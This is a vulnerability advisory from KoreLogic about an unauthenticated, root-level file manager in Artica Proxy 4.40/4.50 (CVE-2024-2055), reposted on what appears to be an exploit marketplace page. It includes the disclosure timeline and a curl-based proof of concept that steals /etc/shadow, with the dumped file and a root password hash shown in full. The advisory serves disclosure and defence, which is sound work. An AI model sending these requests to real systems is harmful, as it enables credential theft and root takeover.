0day.today - Größte Exploit-Datenbank der Welt.
Dinge, die Du wissen solltest:
Wir benutzen eine Hauptdomain DOMAIN_LINK
Wenn Du den Exploit kaufen, oder für einen Service bezahlen möchtest, musst Du Gold kaufen. Wir wollen nicht, dass Du unsere Seite als ein Werkzeug für Aktivitäten wie Hacking verwendest. Illegale Aktionen, die andere Benutzer oder Webseiten betreffen, für die Du keine Zugriffsrechte hast, führen dazu, dass der Account gebannt und alle Daten von diesem unwiderruflich gelöscht werden.
Die Administratoren dieser Seite benutzen nur die offiziellen Kontaktdaten. Achte auf Betrüger!
Wir benutzen eine Hauptdomain DOMAIN_LINK
Wenn Du den Exploit kaufen, oder für einen Service bezahlen möchtest, musst Du Gold kaufen. Wir wollen nicht, dass Du unsere Seite als ein Werkzeug für Aktivitäten wie Hacking verwendest. Illegale Aktionen, die andere Benutzer oder Webseiten betreffen, für die Du keine Zugriffsrechte hast, führen dazu, dass der Account gebannt und alle Daten von diesem unwiderruflich gelöscht werden.
Die Administratoren dieser Seite benutzen nur die offiziellen Kontaktdaten. Achte auf Betrüger!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Lies [ Vereinbarung ]
- Lies [ Senden ] Regeln
- Besuche [ FAQ ] page
- [ Registrieren ] Profil
- Bekommen [ GOLD ]
- Wenn Du möchtest [ Verkaufen ]
- Wenn Du möchtest [ Kaufen ]
- Wenn Du vergessen hast [ Account ]
- Fragen [ [email protected] ]
- Anmeldungsseite
- Registrierungsseite
- Seite für Accountwiederherstellung
- FAQ Seite
- Kontakt
- Regeln für Veröffentlichungen
- Vereinbarungsseite
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Artica Proxy 4.40 / 4.50 Authentication Bypass / Privilege Escalation Vulnerability
Autor
Risiko
[
Security Risk High
]0day-ID
Kategorie
Datum hinzufügen
CVE
Betriebssystem
Title: Artica Proxy Unauthenticated File Manager Vulnerability Advisory ID: KL-001-2024-003 Publication Date: 2024.03.05 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt 1. Vulnerability Details Affected Vendor: Artica Affected Product: Artica Proxy Affected Version: 4.40 and 4.50 Platform: Debian 10 LTS CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel, CWE-552: Files or Directories Accessible to External Parties CVE ID: CVE-2024-2055 2. Vulnerability Description The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user. 3. Technical Description The Artica Proxy can be installed with a small amount of "Features" enabled. Within the administrative web interface, additional features can be installed, enabled, and disabled. The "Rich Filemanager" feature is disabled by default. Enabling this feature will spawn a listener on port 5000/tcp bound to 0.0.0.0. By default, when this feature is enabled, authentication is not required to access the web interface. The "Rich Filemanager" runs as the root user. This provides an unauthenticated attacker complete access to the file system. root@artica:~# ps -efww | grep -i File root 1888 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER root 1889 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER This can be exploited by an attacker to add entries in to /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create an additional root-level account that has the ability to SSH in to the system. 4. Mitigation and Remediation Recommendation No response from vendor. Rich Filemanager feature is disabled by default. Leave it that way. 5. Credit This vulnerability was discovered by Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2023.12.18 - KoreLogic requests vulnerability contact and secure communication method from Artica. 2023.12.18 - Artica Support issues automated ticket #1703011342 promising follow-up from a human. 2024.01.10 - KoreLogic again requests vulnerability contact and secure communication method from Artica. 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from mail.articatech.com with response "Client host rejected: Go Away!" 2024.01.11 - KoreLogic requests vulnerability contact and secure communication method via https://www.articatech.com/ 'Contact Us' web form. 2024.01.23 - KoreLogic requests CVE from MITRE. 2024.01.23 - MITRE issues automated ticket #1591692 promising follow-up from a human. 2024.02.01 - 30 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.06 - KoreLogic requests update on CVE from MITRE. 2024.02.15 - KoreLogic requests update on CVE from MITRE. 2024.02.22 - KoreLogic reaches out to alternate CNA for CVE identifiers. 2024.02.26 - 45 business days have elapsed since KoreLogic attempted to contact the vendor. 2024.02.29 - Vulnerability details presented to AHA! (takeonme.org) by proxy. 2024.03.01 - AHA! issues CVE-2024-2055 to track this vulnerability. 2024.03.05 - KoreLogic public disclosure. 7. Proof of Concept Step 1: Move /etc/shadow to /tmp/shadow $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198' {"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}} Step 2: Download /tmp/shadow $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H $'Cache-Control: no-cache' $'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870' root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7::: daemon:*:19507:0:99999:7::: bin:*:19507:0:99999:7::: sys:*:19507:0:99999:7::: sync:*:19507:0:99999:7::: games:*:19507:0:99999:7::: man:*:19507:0:99999:7::: lp:*:19507:0:99999:7::: mail:*:19507:0:99999:7::: news:*:19507:0:99999:7::: uucp:*:19507:0:99999:7::: proxy:*:19507:0:99999:7::: www-data:*:19507:0:99999:7::: backup:*:19507:0:99999:7::: list:*:19507:0:99999:7::: irc:*:19507:0:99999:7::: gnats:*:19507:0:99999:7::: nobody:*:19507:0:99999:7::: _apt:*:19507:0:99999:7::: systemd-timesync:*:19507:0:99999:7::: systemd-network:*:19507:0:99999:7::: systemd-resolve:*:19507:0:99999:7::: messagebus:*:19507:0:99999:7::: quagga:*:19507:0:99999:7::: apt-mirror:*:19507:0:99999:7::: privoxy:*:19507:0:99999:7::: ntp:*:19507:0:99999:7::: redsocks:!:19507:0:99999:7::: prads:*:19507:0:99999:7::: freerad:*:19507:0:99999:7::: vnstat:*:19507:0:99999:7::: stunnel4:!:19507:0:99999:7::: sshd:*:19507:0:99999:7::: vde2-net:*:19507:0:99999:7::: memcache:!:19507:0:99999:7::: davfs2:*:19507:0:99999:7::: ziproxy:!:19507:0:99999:7::: proftpd:!:19507:0:99999:7::: ftp:*:19507:0:99999:7::: mosquitto:*:19507:0:99999:7::: openldap:!:19507:0:99999:7::: munin:*:19507:0:99999:7::: msmtp:*:19507:0:99999:7::: Debian-snmp:!:19507:0:99999:7::: opendkim:*:19507:0:99999:7::: avahi:*:19507:0:99999:7::: glances:*:19507:0:99999:7::: ArticaStats:!:19507:0:99999:7::: netdata:!:19507:0:99999:7::: mysql:!:19507:0:99999:7::: postfix:!:19507:0:99999:7::: squid:!:19507:0:99999:7::: smokeping:!:19507:0:99999:7::: unbound:!:19645:0:99999:7::: Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' $'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208' {"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}} The contents of this advisory are copyright(c) 2024 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ # 0day.today [2024-07-01] #